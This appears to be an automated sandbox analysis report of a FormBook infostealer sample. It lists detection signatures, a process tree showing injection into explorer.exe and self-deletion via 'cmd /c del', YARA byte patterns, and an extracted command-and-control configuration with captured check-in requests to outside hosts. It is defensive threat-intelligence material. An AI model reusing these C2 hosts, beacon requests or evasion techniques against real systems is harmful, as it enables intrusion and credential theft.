Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Sample Name:cK1g5gckZR9VHjj.exe
Analysis ID:528618
MD5:5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1:25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256:afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cK1g5gckZR9VHjj.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 1312 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 6104 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 6900 cmdline: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 18 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: cK1g5gckZR9VHjj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: cK1g5gckZR9VHjj.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop edi2_2_00415660
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop esi2_2_004157D8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 4x nop then pop esi2_2_004157AA
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi12_2_02DD5660
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi12_2_02DD57D8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop esi12_2_02DD57AA

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 142.252.22.166 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.94.210.101 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dragonmodz.net
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.blueprintroslyn.com
          Source: C:\Windows\explorer.exeDomain query: www.qzttb.net
          Source: C:\Windows\explorer.exeDomain query: www.royaldears.com
          Source: C:\Windows\explorer.exeDomain query: www.pittsburghdata.center
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.spoiledzone.com/udeh/
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: PHP/7.0.33X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 14:11:35 GMTConnection: closeContent-Length: 7447Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
          Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.qzttb.net
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1Host: www.qzttb.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1Host: www.royaldears.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1Host: www.dragonmodz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
